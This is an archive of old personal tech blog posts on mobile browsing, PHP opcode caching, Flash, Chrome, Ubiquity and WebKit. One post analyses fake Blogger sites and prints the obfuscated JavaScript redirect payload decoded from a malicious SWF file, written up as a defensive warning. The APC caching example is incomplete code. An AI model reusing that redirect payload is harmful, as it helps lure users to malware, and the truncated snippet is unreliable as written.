Ben Harper for President

It’s approx. 3:30am here in Belgium now and thus still early days, but with swing states Pennsylvania and Ohio projected to have been won by Obama, it looks like he will indeed be the 44th President of the United States.
I only found out yesterday that Ben Harper’s “Better Way” was the Obama campaign theme song and I’ve been listening to it over and over since, it’s a inspiring song about hope and change. Join in below;

Congratulations to America and good luck to  Mr. Obama, great challenges await him, and expectations about what he could achieve are even greater!

My Mobile bookmarks

A quick list of the most frequently used sites on my mobile phone.

  1. gmail mobile: my “homepage”. attachments and images could be handled better, but still, a great mobile web-app.
  2. google reader mobile: too many blogs, too little time. reading up on my blogfeeds everywhere i can (and yes, that includes the loo)
  3. smartphone/pda version of bbc news; the beeb was one of the first to have a version for PDA’s and smartphone’s, still great stuff.
  4. deredactie mobile: I just love the mobile version of their awful “desktop-oriented” website. Guess they took a close look at the BBC’s mobile site, no? Anyway, it would be even greater if they added links to multimedia (i.e. not force-feed video as they do on their very-very-broadband-version) and if they optimized the color usage because the readability of the purple night-version is sub-optimal.
  5. facebook mobile: I never really liked Facebook, but I must admit I’ve found myself spending time on it on an almost daily basis. The mobile version is an important part of that usage pattern.

Less frequently used mobile sites include; Truvo’s yellow and white pages, Wapedia (as wikipedia doesn’t provide a mobile version, they should) and Linkedin mobile. And although the webkit-based nokia browser handles normal sites quite well, the only non-mobile-optimized site in my bookmarks is my blog’s dashboard.
And you, what sites do you visit on your IPhone, Blackberry or Nokia e71?

Is the web too fat for your IPhone?

So you have a spiffy mobile phone with a top notch browser that does a decent job at displaying “desktop-oriented” websites and you use it to surf the web regularly, visiting some of the bigger news-sites in Belgium. What does that mean, from the point of view of data transfer and bandwidth usage?

data usage for 4 pages on 5 sites (click on image for more, methodology see below)

That sure is a lot of data, Captain! What does that mean?

  1. You will have to be patient, because downloading 1 or 2 Mb for that initial page will probably be gruesomely slow (especially if you’re on EDGE because there’s no 3G-coverage)
  2. You will end up paying good money for all that data transfer, because data is money when you’re on mobile time
  3. You might even curse your handset or crashing browser (more on google), because all that data will end up in RAM and these devices do not come with tons of that.

In these broadband-times, website builders seem to have completely forgotten about best practices for download size of complete web pages (html + all js/css/images/…). This means that a lot of websites should be considered non-accessible on mobile devices.
If you want your normal website to be usable on IPhone’s, HTC’s and other Nokia’s, you’ll have to start taking download size into account again. That means taking some technical measures (using mod_deflate and mod_expires for example) and making hard functional choices to remove some stuff (on this blog dropping the rather useless mybloglog-widget saved me 210Kb, going from 10 to 7 posts per page another 200). And if you want to target mobile users specifically, you’d better invest in a mobile-specific version of your site!

The methodology followed to measure these download sizes;

  • disable flash (there’s no such thing on mobiles, with flash these figures would have been even far worse)
  • disable memory cache (in about:config), because it can’t be cleared easily
  • clear disk cache
  • open up firebug and click on ‘net’ to monitor downloads
  • download homepage, random 2nd page, random 3th page and the homepage again

The spreadsheet (on google docs) contains more data (compare above results with those for 2 mobile-specific sites)

Fun with caching in PHP with APC (and others)

After installing APC, I looked through the documentation on and noticed 3 interesting functions with regards to session-independent data caching in PHP;

When talking about caching, apc_delete might not be that important, as apc_store allows you to set the TTL (time to live) of the variable you’re storing. If you try to retrieve a stored variable which exceeded the TTL, APC will return FALSE, which tells you to update your cache.
All this means that adding 5 minutes worth of caching to your application could be as simple as doing;

if (($stringValue=apc_fetch($stringKey)) === FALSE) {
$stringValue = yourNormalDogSlowFunctionToGetValue($stringKey);

From a security point-of-view however (esp. on a shared environment) the APC-functions should be considered extremely dangerous. There are no mechanisms to prevent a denial of service; everyone who “does PHP” on a server can fill the APC-cache entirely. Worse yet, using apc_cache_info you can get a list of all keys which you in turn can use to retrieve all associated values, meaning data theft can be an issue as well. But if you’re on a server of your own (and if you trust all php-scripts you install on there), the APC-functions can be sheer bliss!
And off course other opcode caching components such as XCache and eAccelerator offer similar functionality (although it’s disabled by default in eAccelerator because of the security concerns).

Trading eAccelerator for APC

Yesterday I somewhat reluctantly removed eAccelerator from my server (Debian Etch) and installed APC instead. Not because I wasn’t satisfied with performance of eAccelerator, but because the packaged version of it was not in the Debian repositories (Andrew McMillan provided the debs), and those debs weren’t upgraded at the same pace and thus broke my normal upgrade-routine. Moreover APC will apparently become a default part of PHP6 (making the Alternative PHP Cache the default opcode cache component). Installation was as easy as doing “pecl install apc” and adding apc to php.ini. Everything seems to be running as great as it did with eAccelerator (as most test seem to confirm).

Nasty blog, scary flash, why are you attacking me?

Yesterday I noticed that all of a sudden no less then 6 new sites linked to this small-time blog. Great huh? Except when checking out those blogs (all on google’s blogger-platform by the way), I quickly saw they were fake, attempting to trick users into installing malware on their windows PC’s.
Being the curious would-be hacker I am, I took the plunge to see how these guys go about trying to infect careless users;
  1. the blogpost contains what seems to be a youtube movie, but which actually is just a animated gif with a link behind it
  2. when clicking “the movie” to play, a swf-file is downloaded (blog.swf)
  3. that blog.swf (which i downloaded on my linux-box and decompiled on the commandline using flare) contains this simple code:
    • this.getURL(‘javascript:eval(unescape(‘%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%2F%2F%6D%30%38%62%2E%63%6F%6D%2F%69%6E%2E%63%67%69%3F%64%65%66%61%75%6C%74%22%3B’))’);
    • which translates roughtly into go to
  4. and that URL then takes you for a rollercoaster ride, going through several redirector-sites before arriving on a dark corner of the web where you’re told to install an activeX-component to watch a movie or a codec or sometimes even be told (the irony) to install antivirus software from some unknown company.

Some lessons learned;

  • Flash is evil (or it can be) as it allows attackers to hide malicious code inside a nice looking (and binary) swf-file.
  • Don’t trust the incoming links functionality google’s blogsearch provides (i switched back to technorati for the ‘binnenkomers’-widget on my blog)
  • The ‘report web forgery‘ function in Firefox (under ‘help’) works great. Use it!

Hey Adobe; get your Flash together

Flash sucks! Really! It crashes my Firefox all too often (every few days, especially when behind our company proxy) and playing Flash movies consumes way too much CPU-power for my liking. Apparently Mozilla and Adobe are blaming each other with regard to some of these problems, but this really seems to be a Flash-issue;

Moreover, I found a great howto on “Bort’s w3bl0g” about how to wrap Flash inside NSPluginWrapper in (Ubuntu) Linux, isolating Firefox from Flash-crashes. I’ll try that over the weekend, but it sure looks great!
But anyway; Adobe, get your shit together!

Google to launch Chrome, a Webkit-based browser

Yesterday Google confirmed that it would be releasing a new browser in beta today, named Chrome. Everything there is to know about this new open source browser for now, can be found in an online comic.
Based on that publication, the most important features seem to be;

  • each tab runs its own sandboxed process (limiting the damage one tab or plugin within a tab) can do (as is also the case in MSIE 8 beta with what they call “Loosely coupled IE”)
  • it is based on webkit (remember khtml and Apple’s Safari and all those mobile browsers)
  • it features a new javascript virtual machine, build by v8, a Danish company
  • the ‘omnibox’ (cfr. the ‘awesomebar‘ in Firefox) is located on the tab-level instead of the window and is thightly integrated with (you guessed it) google
  • a new tab shows you your 9 most visited sites and your 3 most uses search-engines (a bit like Opera Speeddial)
  • it features a ‘icognito’ mode in which nothing is logged (cfr. InPrivate browsing in IE 8 beta 2)
  • google gears comes prebaked
  • it is not clear if Google used Mozilla’s XUL/chrome to build the UI elements, but the name might be an indication that they did and the comic does state that Google “owes a great debt to other open source browser projects, especially Mozilla and Webkit”, so …

Looks very interesting, i’ll download is as soon as it’s available later today. But I’m curious what the Mozilla-guys think of what must be a double dent in their ego with a friend gone foo (well, to a certain extent) and with Google not using Mozilla’s Gecko as html-rendering engine.
Update; a screenshot of the new browser:

I’ve seen the browser-future, and it works!

Although browsers clearly have become better, faster and stronger (I doubt they’ve become “harder” as well), it sometimes seems as if no revolutions have taken place apart from the introduction of XMLHttpRequest by Microsoft back in 2000. But this morning I saw something that really blew my mind and the live mashup of that great Daft Punk song perfectly describes the mood I’m in since.
The reason for all this excitement is a prototype of new functionality in Firefox that redefines how you can interact with websites and -applications, allowing you to use the web more efficiently. Just watch this video to see what I’m raving about (skip the first 50 seconds to see the actual goods);

Ubiquity, as the 0.1 Firefox add-on is called, is the work of a group of smart people at Mozilla Labs, headed by Aza Raskin. Aza is the guy behind Humanized, the company that developed Enso, a merger of a GUI and a CLI leveraging the power of language in a graphical user interface. Aza and a number of his co-workers joined Mozilla at the beginning of 2008 and they’ve already produced some innovative ideas over the last few months.
Ubiquity is past that initial idea-stage, with a prototype that really builds on the great idea’s Aza and his Humanized co-workers had with regards to the power of language in a UI. I’ll bet you this will be the way to disclose and use microformats in Firefox as well (breaking the deadlock the microformat-guys were in). Even though it’s still in alpha/ prototype phase, this is the Future guys and it works! Now try it out, will ya!!

Webkit Konquering the mobile world

With the nineties browser wars and the quasi MSIE monopoly that followed after the Netscape debacle behind us, the desktop browser scene can be considered a mature market, with some very good products vying for our approval. Time to shift our attention to the next battleground; mobile browsers. Netfront and Pocket Internet Explorer dominated this emerging market for quite some time, but as of late some newcomers are making great advances in this area. And apart from Opera Mobile and Mini (the Mozilla-guys are really ages behind here), these all share the same open source core; WebKit.
The history of WebKit in 10 1/2 sentences
WebKit is a fork of KHTML, the html rendering-engine that was developed by the KDE-community for its Konquerer-browser. In 2002 Apple decided to build it’s own browser based on KHTML and thus WebKit was born as the core-component of what would become Safari. Since it’s inception, WebKit has gained enourmous momentum; Safari now has a market share of approx 6% on the desktop, but smaller projects such as iCab and Epiphany (the Gnome browser!) picked up WebKit as well. But there’s more; Adobe decided to incorporate it in Air (the Flex-like platform for building desktop-software). And Trolltech, the company behind the Qt GUI-toolkit and one of the primary backers of KDE, announced they would include Webkit in Qt 4.4 as well.

WebKit 0wnz Mobile
But the mobile area is where WebKit is really taking the world by storm; it not only powers the mobile version of Safari on the iPhone and the iPod Touch, but WebKit (in its S60webkit form) it’s also the basis of Symbian’s S60-browser. Nokia ‘s Mini Map Browser, as it’s officially named, was first released in november 2005 and thanks to the succces of Symbian it’s probably the most widespread mobile browser by far. Being a proud Nokia e61i-owner myself, I can testify that it is a great browser indeed; I didn’t even bother with installing Opera Mini (which I used instead of Netfront on my Sony-Ericsson w810).
Next to these two well-established WebKit-derivatives, the lesser known Iris (for Windows Mobile), newcomer Digia (for Symbian UIQ-devices) and last but not least the browser of Google’s highly anticipated mobile Android OS are also part of the family.
Mobile Web, but there’s more then One
So thanks to KDE’s great job on KHTML and Apple’s (and Nokia’s) subsequent work, we are at a point where users of ‘smartphones’ and similar devices can access the internet almost as if they were using a desktop-browser. But screen-size, text-input, data transfer (bandwidth and price) and context remain very different from normal browsing, so don’t believe the “one web”-hype just yet. But still; these sure are great web times for building mobile(-ready) websites and -applications!